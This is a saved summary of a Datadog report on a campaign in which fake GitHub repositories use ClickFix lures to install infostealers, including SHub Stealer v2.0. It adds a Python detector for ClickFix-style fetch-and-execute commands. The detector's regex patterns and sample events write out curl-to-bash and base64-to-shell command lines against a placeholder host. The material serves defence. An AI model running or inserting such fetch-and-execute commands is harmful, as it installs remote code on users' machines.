Saved February 14, 2026
Do you care about this?
Datadog reports an ongoing campaign using fake GitHub repositories to trick users into installing infostealers via the ClickFix technique. The threat actor targets established software brands and has introduced a new variant called SHub Stealer v2.0, which includes advanced features like persistence and remote access.
If you do, here's more
Datadog has uncovered a campaign using counterfeit GitHub repositories to impersonate legitimate software companies, employing the ClickFix technique to trick users into installing infostealers. The operation is ongoing and appears to be evolving, with the threat actor reportedly expanding functionality to include Windows-based infostealers alongside the existing macOS variants. A new infostealer, dubbed SHub Stealer v2.0, has been identified, featuring enhanced capabilities like persistence and remote access.
The attack method resembles package typosquatting but targets users of well-known tech companies instead of relying on developer mistakes. By shifting the execution to the victim, the ClickFix technique makes it easier for attackers to execute their malicious code without needing to exploit vulnerabilities directly. This allows for a scalable approach, as the same initial access mechanism can be reused across different campaigns and malware families.
Victims who click a download link in the fake repository are taken through a multi-stage redirect chain. It ends on a site that mimics GitHub and uses custom JavaScript to detect the visitor's operating system: macOS users are sent to a ClickFix page, while Windows users receive a ZIP download. The ClickFix page instructs macOS users to paste a command into their terminal; that command downloads and executes malicious scripts, and it is crafted to look like a legitimate fix so the victim does not question it.
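The fetch-and-execute step that the ClickFix lure depends on leaves a recognisable trace in endpoint process telemetry. As an added example (not code from the Datadog report), the following Python heuristic flags shell commands spawned from a terminal app that pipe downloaded or base64-decoded content straight into an interpreter; the event field names and the sample events are constructed assumptions, not real telemetry.

```python
"""Flag ClickFix-style fetch-and-execute commands in macOS process events.

Added example, not from the Datadog report. Field names (parent_name,
cmdline, pid) are hypothetical EDR-style fields; sample data is constructed.
"""
import json
import re

# Heuristics: a download tool feeding an interpreter through a pipe,
# or a base64 decode feeding an interpreter through a pipe.
FETCH = r"\b(?:curl|wget)\b[^|]*"
INTERP = r"\b(?:sh|bash|zsh|python3?|osascript)\b"
PATTERNS = [
    re.compile(FETCH + r"\|\s*(?:sudo\s+)?" + INTERP),
    re.compile(r"\bbase64\b[^|]*(?:-d|--decode|-D)[^|]*\|\s*" + INTERP),
]
TERMINALS = {"Terminal", "iTerm2"}

def is_clickfix_like(event: dict) -> bool:
    """True when a command run from a terminal app matches the pattern
    the ClickFix lure asks the victim to paste: fetch, then execute."""
    if event.get("parent_name") not in TERMINALS:
        return False
    return any(p.search(event.get("cmdline", "")) for p in PATTERNS)

def scan(lines):
    """Return (pid, cmdline) for every flagged event in a JSON-lines feed."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if is_clickfix_like(ev):
            hits.append((ev["pid"], ev["cmdline"]))
    return hits

# Constructed sample telemetry; example.invalid is a placeholder, not an IoC.
SAMPLE = [
    '{"pid": 501, "parent_name": "Terminal", "cmdline": "ls -la"}',
    '{"pid": 502, "parent_name": "Terminal", "cmdline": "curl -fsSL https://example.invalid/fix.sh | bash"}',
    '{"pid": 503, "parent_name": "Terminal", "cmdline": "echo aGk= | base64 -D | sh"}',
    '{"pid": 504, "parent_name": "launchd", "cmdline": "curl -fsSL https://example.invalid/x | sh"}',
    '{"pid": 505, "parent_name": "Terminal", "cmdline": "curl -O https://example.invalid/tool.tgz"}',
]

if __name__ == "__main__":
    for pid, cmd in scan(SAMPLE):
        print(f"ALERT pid={pid}: {cmd}")
```

Event 504 is deliberately left unflagged: the same command line spawned by launchd rather than a terminal app is a different (scheduled or service) pattern and would need its own rule.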
Datadog's monitoring identified multiple malicious repositories masquerading as legitimate applications, including one posing as a "Datadog Desktop App." These impersonations lack actual application code and primarily serve to redirect victims to malicious sites. The perpetrators have also improved their infrastructure and telemetry collection methods, making their operations more sophisticated and harder to detect.